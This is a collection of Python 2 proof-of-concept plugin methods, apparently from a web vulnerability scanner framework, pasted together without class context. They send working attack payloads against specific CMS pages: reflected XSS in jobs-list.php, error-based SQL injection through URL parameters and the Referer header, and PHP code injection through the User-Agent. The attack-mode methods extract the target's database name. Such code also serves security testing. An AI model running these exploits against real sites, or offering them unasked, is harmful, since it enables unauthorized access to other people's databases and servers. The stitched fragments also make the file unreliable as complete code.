def _verify(self):
"""verify mode"""
result = {}
s = req.Session()
s.get(self.url)
self.url = self.url.strip('/') + "/jobs/jobs-list.php"
flag = "".join(
random.choice(string.ascii_letters) for _ in xrange(0, 8))
flag = flag.lower()
payload = "/jobs/jobs-list.php?key=%22%20autofocus%20onfocus=alert%28{}%29%20style=%22%22".format(
flag)
url = self.url + payload
resp = s.get(url)
time.sleep(2)
if '" autofocus onfocus=alert({}) style='.format(flag) in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
def _attack(self):
"""attack mode"""
result = {}
s = req.Session()
s.get(self.url)
for i in self.url_list:
url = self.url.strip('/') + i
payload = "+and+1=%28SELECT%20%20char%28126%29%2bDB_NAME()%2bchar%28126%29%29--+"
url_p = url + payload
resp = s.get(url_p)
dbname = re.search('~(.*?)~', resp.content)
if dbname:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['Database'] = {}
result['Database']['DBname'] = dbname.group(1)
break
return self.parse_output(result)
def _verify(self):
"""verify mode"""
result = {}
s = req.Session()
s.get(self.url)
self.url = self.url + '/info.php?fid=1&tblprefix=cms_msession'
payload1 = '/**/where/**/1/**/and/**/updatexml(1,concat(0x37,(select/**/'
paylaod2 = '/**/limit/**/0,1)),1)%23'
flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0,8))
flag = flag.lower()
geturl = self.url + payload1 + flag + paylaod2
resp = s.get(geturl)
con = re.search(flag, resp.text)
time.sleep(2)
if con:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
def _verify(self):
"""verify mode"""
result = {}
s = req.Session()
s.get(self.url)
self.url = self.url.strip('/') + "/c.php?id=1"
flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
flag = flag.lower()
payload = "1',(SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),(SELECT {}))a from information_schema.tables group by a)b),'".format(flag)
header = {
'referer': payload
}
resp = s.get(self.url, headers=header)
time.sleep(2)
if flag in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)
def _verify(self, verify=True):
result = {}
vul_url = self.url
php_code = '''echo "asdfgh123456";'''
attack_payload = self.gen_payload(php_code)
session = req.Session()
response = session.get(vul_url, headers={"User-Agent": attack_payload})
if response.status_code != 200:
return self.parse_attack(result)
response = session.get(vul_url)
if response.status_code == 200 and 'asdfgh123456' in response.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['Payload'] = attack_payload
return self.parse_attack(result)
def _attack(self):
"""attack mode"""
result = {}
s = req.Session()
s.get(self.url)
self.url = self.url.strip('/') + "/c.php?id=1"
payload = "1',(SELECT 1 FROM (select count(*), concat(floor(rand(0)*2),(SELECT concat(0x7e,database(),0x7e)))a from information_schema.tables group by a)b),'"
header = {
'referer': payload
}
resp = s.get(self.url, headers=header)
time.sleep(2)
dbname = re.search('~(.*?)~', resp.content)
if dbname:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['Database'] = {}
result['Database']['DBname'] = dbname.group(1)
return self.parse_output(result)
def send_command(url):
try:
httpreq = req.Session()
headers ={
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
"Connection": "close",
"Cookie": "_gauges_unique_month=1; _gauges_unique_year=1; _gauges_unique=1; _gauges_unique_hour=1; _gauges_unique_day=1",
"Host": "httpbin.org",
"Referer": "http://httpbin.org/",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
}
resp = httpreq.get(url, headers=headers)
except:
resp = None
return resp
def _verify(self):
"""verify mode"""
result = {}
s = req.Session()
s.get(self.url)
self.url = self.url.strip(
'/'
) + '/search.php?chid=1&carsfullname=aa&searchmode=subject&orderby=aid'
payload1 = '%20and%20(select%201%20from%20(select%20count(*),concat('
paylaod2 = ',floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&addno=0&ccid8=366'
flag = "".join(
random.choice(string.ascii_letters) for _ in xrange(0, 8))
flag = flag.lower()
geturl = self.url + payload1 + flag + paylaod2
resp = s.get(geturl)
con = re.search(flag, resp.text)
time.sleep(2)
if con:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_output(result)